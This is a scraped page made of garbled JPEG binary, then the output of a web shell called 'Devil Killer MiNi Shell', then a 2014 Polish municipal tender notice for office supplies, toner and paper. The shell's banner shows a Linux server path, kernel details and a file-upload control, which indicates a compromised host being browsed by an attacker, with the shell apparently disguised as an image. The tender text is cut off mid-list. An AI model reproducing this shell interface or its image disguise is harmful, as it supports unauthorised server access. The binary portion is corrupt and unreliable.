JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140214/53082-N-2014.html

<p class="kh_header"><b>Świebodzin: Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy</b><br>
<b>Numer ogłoszenia: 53082 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 68 4750916, faks 68 4750916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy, obejmujące:    

1.1. Grupa I: Dostawa materiałów biurowych:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Segregator 70 - różne kolory okładzin (nie tylko grzbietów) - 450 szt.
2. Segregator 50 - różne kolory okładzin (nie tylko grzbietów) - 200 szt.
3. Segregator plastikowy A4, szerokość - 70, kolor niebieski - 2 szt.
4. Teczka wiązana A4 - 150 szt.
5. Teczka zwykła (skoroszyt) A4 - 400 szt.
6. Teczka zawieszana A4 - 600 szt.
7. Koperta DL samoklejąca - 110x220 mm (biała z okienkiem lewym), pakowane po 1000 szt. - 14 000 szt. 
8. Koperta DL samoklejąca - 110x220 mm (biała z okienkiem prawym), pakowane po 1000 szt. - 4 000 szt.
9. Koperta C6 (biała, samoklejąca) - 18 000 szt.
10. Koperta C5 (biała, samoklejąca) - 6 000 szt.
11. Koperta z rozszerzanymi bokami i spodem B4+HK, samoklejąca z paskiem, o wym. 255x390x40, biała, 150g/m2 - 200 szt.
12. Koperta z rozszerzanymi bokami i spodem E4, samoklejąca z paskiem, o wym. 280x400x40 mm, biała - 40 szt. 
13. Koperta C6 (biała samoklejąca) z okienkiem po prawej stronie - 1 000 szt.
14. Koperta bąbelkowa z folią ochronną wewnątrz, wymiar zewnętrzny  - 180x265 mm, samoklejąca, biała - 100 szt.
15. Koperta bąbelkowa z folią ochronną wewnątrz, wymiar wewnętrzny - 240x340 mm, samoklejąca, biała - 40 szt.
16. Koszulki A4 - 6 000 szt.
17. Rolka termiczna do kasy rejestrującej, wymiary: 57 mm x 25 m po 10 szt. w opakowaniu - 10 opak.
18. Notatnik  A4 w kratkę - 100 kartkowy klejony po krótszym boku - 50 szt.
19. Notatnik A5 w kratkę - 100 kartkowy klejony po krótszym boku - 50 szt.
20. Zeszyt akademicki 96 kartkowy - sztywna okładka - 30 szt.
21. Zeszyt 32 kartkowy w kratkę - 50 szt.
22. Korektor w taśmie 5 mm x 8 m - 10 szt.
23. Kalka maszynowa A4 czarna pakowana po 25 arkuszy - 2 szt.
24. Kalka ołówkowa A4 niebieska pakowana po 50 arkuszy - 3 szt.
25. Zszywki 24/6 1000 szt. w opak. - 300 opak.       
26. Zszywki 26/8 1000 szt. w opak. - 10 opak.
27. Fascykuły bezkwasowe ze sznurkiem do archiwizacji dokumentów, format A4 z czterema otworami (otwory na prawym i lewym boku przez środek) - 1 000 komp.
28. Spinacze małe 28 mm - po 100 szt. w opak. - 150 opak.
29. Spinacze duże 50 mm - po 100 szt. w opak. - 20 opak.
30. Przekładki kartonowe do segregowania dokumentów, format: 240x105 mm, różne kolory, pakowane po 100 szt. - 1 opak.
31. Skoroszyt oczkowy, kartonowy, pełny A4 - 490 szt.
32. Taśma klejąca szeroka, przezroczysta, wymiary 48 x 50 mm - 30 szt.
33. Teczka A4 do podpisu dokumentów, wykonana ze sztywnej tektury,19 przekładek z otworami, kolory: ? - granatowe, ? zielone - 10 szt.
34. Skoroszyt plastikowy A4 z oczkami do zawieszania w segregatorze - 300 szt.
35. Zszywacz do papieru, wykonany z metalu z wykończeniem z tworzywa sztucznego, zszywający do 30 kartek, do zszywek o wymiarach: 24/6 i 26x6 mm, pojemność 100 zszywek - 10 szt.
36. Zszywacz do papieru, wykonany z metalu zszywający do 50 kartek, do zszywek o wymiarach: 24/6-24/8 i 26x6 mm, zszywanie zamknięte i otwarte - 5 szt.
37. Zszywacz do 60 kartek wykorzystujący najnowszą technologię SuperFlatClinchTM oraz Press Less, na zszywki 26/8+ lub 24/8+, pojemność magazynka: do 103 lub do 141 zszywek - 5 szt.
38. Zszywacz archiwizacyjny, metalowy, wyposażony w stabilną podstawę i wskaźnik ilości zszywek. Zszywający jednorazowo do 240 kartek, na zszywki: 23/6, 23/8, 23/10, 23/13, 23/15, 23/17, 23/20, 23/24 - 3 szt. 
39. Dziurkacz archiwizacyjny do dziurkowania jednorazowo do 100 kartek (max. 110), wyposażony w metalową podstawę i dźwignię, ergonomiczny korpus, głębokość wsuwania kartek 12 mm - 4 szt. 
40. Dziurkacz, wytrzymały wykonany z metalowej dźwigni i podstawy, dziurkujący jednorazowo do 65 kartek, wyposażony w blokadę dźwigni i listwę formatową - 3 szt. 
41. Dziurkacz dziurkujący jednorazowo do 40 kartek, z ogranicznikiem formatu - 7 szt.
42. Folia do bindowania A4, pakowana po 100 ark., grubość 150 mic. (przezroczysta bez koloru) - 2 opak.
43. Okładki papierowe do bindowania, format A4, pakowane po 100 ark., kolor czarny - 1 opak.
44. Grzbiety do bindowania 14 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 1 opak.
45. Grzbiety do bindowania 19 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 1 opak.
46. Grzbiety do bindowania 16 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 2 opak.
47. Kalkulator - 5 szt.
48. Kalkulator z dwukolorową drukarką na papier 58 mm - 4 szt.
49. Klej do dowodów osobistych 30 ml. w rolce - 50 szt.
50. Klej biurowy, uniwersalny, biały w tubie 40 ml - 150 szt. 
51. Nożyczki biurowe ze stali hartowanej, ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego, Wymiar: 20,5 cm - 10 szt.
52. Taśma węglowa do maszyny elektrycznej typ Optima SP 20 - 2 szt.
53. Taśma korekcyjna do węgla do maszyny elektrycznej typ Optima SP 20, pakowane po 5 szt. - 1 opak.
54. Taśma barwiąca czarno-czerwona do maszynek liczących, 6 m - 20 szt. 
55. Wąsy skoroszytowe - 100 szt.
56. Klip do papieru, metalowy, rozmiar - 51 mm, kolor czarny, pakowane po 12 szt. - 2 opak.
57. Klip do papieru, metalowy, rozmiar - 32 mm, kolor czarny, pakowane po 12 szt. - 3 opak.
58. Folia do laminacji dokumentów, format  A4, grubość 80 mikronów,  pakowana po 100 arkuszy, przezroczysta - 2 opak.
59. Folia do laminacji dokumentów, format  A5, grubość 80 mikronów, pakowana po 100 arkuszy, przezroczysta - 2 opak.
60. Gumki recepturki - 100 szt. w opak. - 10 opak.
61. Karteczki samoprzylepne, żółte - wymiar: 76x76 mm, po 100 kartek w opak. - 20 opak.
62. Pinezki niklowane po 100 szt. w opak. - 4 opak.
63. Tacka na dokumenty, plastikowa o formacie A4, wymiary ok 346x255x66 mm, przezroczysta lub półprzezroczysta - 12 szt.
64. Długopis na sprężynce do 1,5 m, wymienny wkład piszący - 12 szt.

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Blok techniczny A4 kolor - 200 szt.
2. Blok techniczny A4 biały - 250 szt.
3. Brystol A1 biały pakowany po 20 szt. w opakowaniu - 20 opak.
4. Brystol A1 kolory: żółty, czerwony, niebieski, zielony pakowany po 20 szt. - 16 opak. - po 4 opak. z każdego koloru
5. Taśma klejąca - szer. 2 cm - 100 szt.
6. Nożyczki biurowe ze stali hartowanej, ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego, wymiar: 20,5 cm - 30 szt.
7. Ołówek B, pakowane po 12 szt. w opakowaniu - 40 opak.
8. Ołówek B-4, pakowane po 12 szt. w opakowaniu - 40 opak.
9. Klej biurowy, uniwersalny, biały w tubie 40 ml - 70 szt.
10. Długopis żelowy z metalową końcówką,  wodoodporny i nieblaknący - niebieski - 250 szt.
11. Długopis zwykły - niebieski - 250 szt.
12. Marker czarny ścięty - 300 szt.
13. Marker ścięty kolor - czerwony, niebieski, zielony - 600 szt. - po 200 szt. z każdego koloru
14. Papier pakowy szary n/b 40g - 800 szt.
lub

1.2. Grupa II: Dostawa materiałów eksploatacyjnych:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Tusz HP (45) 51645a (czarny) - 2 szt. 
2. Tusz HP (78) c6578a (kolor) - 2 szt.
3. Tusz HP (82) C4913A (69 ml) (Yelow) - 1 szt.
4. Toner HP C7115A - 24 szt.
5. Toner HP Q5949A - 10 szt.
6. Toner HP CE278A - 30 szt.
7. Toner HP Q7553X - 2 szt.
8. Toner HP Q2612A - 2 szt.
9. Toner HP CE505x - 1 szt.
10. Toner Lexmark 0064016HE (21000 kopii) - 10 szt. 
11. Toner Lexmark E260A11E - 1 szt.
12. Toner Samsung SCX-D4200A - 4 szt. 
13. Toner konica minolta A0DKJ51 (CMY) - 1 szt.
14. Toner konica minolta A0DK151 (Black) - 2 szt.
15. Taśma barwiąca do Lexmark 4227+ (00L130034) - 6 szt.
16. Taśma barwiąca do OKI 6300 - 8 szt.
17. Sprężone powietrze - min 300 ml - 10 szt.
18. Toner Panasonic KX-FA83x - 2 szt.
19. Bęben Panasonic KX-FA84E - 1 szt.
20. Toner kit Kyocera TK-3130 (25000 kopii) - 12 szt.
21. Toner kit Kyocera TK-3100 (12500 kopii) - 2 szt.
22. Toner kit Kyocera TK-1140 (7200 kopii) - 7 szt.
23. Tusz Brother LC1280XL-BK - 2 szt.
24. Tusz Brother LC1280XL-Y - 1 szt.
25. Tusz Brother LC1280XL-C - 1 szt.
26. Tusz Brother LC1280XL-M - 1 szt.
27. Toner HP C4127A - 2 szt.

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Tusz HP nr 301 kolor, do urządzenia wielofunkcyjnego HPDJ 2050A - 5 szt.
2. Tusz HP nr 301 czarny, do urządzenia wielofunkcyjnego HPDJ 2050A - 5 szt.
3. Toner nr 85A - 3 szt.
4. Toner nr 49A - 1 szt.
lub

1.3. Grupa III: Dostawa papieru kserograficznego:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Papier ksero A4 80g/m2, biały CIE 146, pakowany fabrycznie po 500 ark. w ryzie zgodny z PN-EN ISO 9706, wilgotność 3-5% - 2 350 ryz 
2. Papier A4, 160 g, biały, pakowany fabrycznie po 250 ark. w ryzie - 5 ryz
3. Papier A4, 80 g, jasny żółty, pakowany fabrycznie po 500 ark. w ryzie - 1 ryza
4. Papier komputerowy - 250 x 12, 1+0 (składanka perforowana 2000 szt.) - 4 kartony
5. Papier komputerowy - 250 x 12, 1+1 (składanka perforowana 900 szt.) - 20 kartonów
6. Papier komputerowy - 250 x 12, 1+2 (składanka perforowana 600 szt.) - 18 kartonów
7. Papier komputerowy - 360 x 12, 1+0 (składanka perforowana 2000 szt.) - 10 kartonów
8. Papier komputerowy - 360 x 12, 1+1 (składanka perforowana 900 szt.) - 4 kartony

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Papier ksero A4 80g/m2, biały CIE146, pakowany fabrycznie po 500 ark. w ryzie zgodny z PN-EN ISO 9706, wilgotność 3-5% - 30 ryz 
2. Papier ksero A4 kolorowy: żółty, niebieski, zielony, liliowy, 80g/m2, pakowany fabrycznie po 500 ark.  w ryzie, wilgotność 3-5% - 16 ryz - po 4 ryzy z każdego koloru

2. Wykonawca ponosi koszty dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z Grupy I (Zadanie 1), Grupy II (Zadanie 1) i Grupy III (Zadanie 1) do magazynu Urzędu Miejskiego w Świebodzinie przy ul. Rynkowej 2, artykuły z Grupy I (Zadanie 2), Grupy II (Zadanie 2) i Grupy III (Zadanie 2) do Świetlicy Inicjatyw Twórczych w Świebodzinie przy ul. Bramkowej 2 i koszty opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu oraz wszelkie inne koszty niezbędne do wykonania przedmiotu zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający nie przewiduje udzielenia zamówień uzupełniających dla Grupy I i Grupy II, zgodnie z art. 67 ust. 1 pkt 7 ustawy - Prawo zamówień publicznych.
2. Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 20% wartości zamówienia podstawowego dla Grupy III Zadania 1, zgodnie z art. 67 ust. 1 pkt 7 ustawy - Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 22.60.00.00-6, 30.19.76.44-2, 30.19.93.10-6, 30.19.95.00-5, 30.19.92.30-1, 30.19.73.30-8, 30.19.76.00-2, 30.19.73.20-5, 22.80.00.00-8, 22.81.60.00-3, 24.91.00.00-6, 30.23.74.30-2, 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2. Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) albo informację o tym, że nie należy do grupy kapitałowej.
3. Formularz/e oferty.
4. Pełnomocnictwo do podpisania oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. Pełnomocnictwo winno być złożone w formie oryginału lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2014 godzina 12:00, miejsce: Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I: Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy, obejmujące:    

1.1. Grupa I: Dostawa materiałów biurowych:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Segregator 70 - różne kolory okładzin (nie tylko grzbietów) - 450 szt.
2. Segregator 50 - różne kolory okładzin (nie tylko grzbietów) - 200 szt.
3. Segregator plastikowy A4, szerokość - 70, kolor niebieski - 2 szt.
4. Teczka wiązana A4 - 150 szt.
5. Teczka zwykła (skoroszyt) A4 - 400 szt.
6. Teczka zawieszana A4 - 600 szt.
7. Koperta DL samoklejąca - 110x220 mm (biała z okienkiem lewym), pakowane po 1000 szt. - 14 000 szt. 
8. Koperta DL samoklejąca - 110x220 mm (biała z okienkiem prawym), pakowane po 1000 szt. - 4 000 szt.
9. Koperta C6 (biała, samoklejąca) - 18 000 szt.
10. Koperta C5 (biała, samoklejąca) - 6 000 szt.
11. Koperta z rozszerzanymi bokami i spodem B4+HK, samoklejąca z paskiem, o wym. 255x390x40, biała, 150g/m2 - 200 szt.
12. Koperta z rozszerzanymi bokami i spodem E4, samoklejąca z paskiem, o wym. 280x400x40 mm, biała - 40 szt. 
13. Koperta C6 (biała samoklejąca) z okienkiem po prawej stronie - 1 000 szt.
14. Koperta bąbelkowa z folią ochronną wewnątrz, wymiar zewnętrzny  - 180x265 mm, samoklejąca, biała - 100 szt.
15. Koperta bąbelkowa z folią ochronną wewnątrz, wymiar wewnętrzny - 240x340 mm, samoklejąca, biała - 40 szt.
16. Koszulki A4 - 6 000 szt.
17. Rolka termiczna do kasy rejestrującej, wymiary: 57 mm x 25 m po 10 szt. w opakowaniu - 10 opak.
18. Notatnik  A4 w kratkę - 100 kartkowy klejony po krótszym boku - 50 szt.
19. Notatnik A5 w kratkę - 100 kartkowy klejony po krótszym boku - 50 szt.
20. Zeszyt akademicki 96 kartkowy - sztywna okładka - 30 szt.
21. Zeszyt 32 kartkowy w kratkę - 50 szt.
22. Korektor w taśmie 5 mm x 8 m - 10 szt.
23. Kalka maszynowa A4 czarna pakowana po 25 arkuszy - 2 szt.
